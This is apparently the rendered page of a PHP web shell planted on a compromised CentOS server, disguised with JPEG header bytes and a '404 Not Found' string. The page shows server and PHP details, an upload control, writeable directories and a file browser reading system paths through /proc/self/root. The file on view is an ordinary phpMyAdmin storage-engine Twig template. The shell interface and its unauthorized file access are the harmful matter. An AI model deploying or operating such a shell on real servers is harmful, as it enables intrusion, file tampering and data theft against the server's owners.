ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/usr/share/phpMyAdmin/templates/server/engines/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/phpMyAdmin/templates/server/engines/show.twig
<h2>
  {{ get_image('b_engine') }}
  {% trans 'Storage engines' %}
</h2>

{% if engine is not empty %}
  <h2>
    {{ get_image('b_engine') }}
    {{ engine.title }}
    {{ show_mysql_docu(engine.help_page) }}
  </h2>
  <p><em>{{ engine.comment }}</em></p>

  {% if engine.info_pages is not empty and engine.info_pages is iterable %}
    <p>
      <strong>[</strong>
      {% if page is empty %}
        <strong>{% trans 'Variables' %}</strong>
      {% else %}
        <a href="{{ url('/server/engines/' ~ engine.engine) }}">
          {% trans 'Variables' %}
        </a>
      {% endif %}
      {% for current, label in engine.info_pages %}
        <strong>|</strong>
        {% if page is defined and page == current %}
          <strong>{{ label }}</strong>
        {% else %}
          <a href="{{ url('/server/engines/' ~ engine.engine ~ '/' ~ current) }}">
            {{ label }}
          </a>
        {% endif %}
      {% endfor %}
      <strong>]</strong>
    </p>
  {% endif %}

  {% if engine.page is not empty %}
    {{ engine.page|raw }}
  {% else %}
    <p>{{ engine.support }}</p>
    {{ engine.variables|raw }}
  {% endif %}
{% else %}
  <p>{{ 'Unknown storage engine.'|trans|error }}</p>
{% endif %}

ZeroDay Forums Mini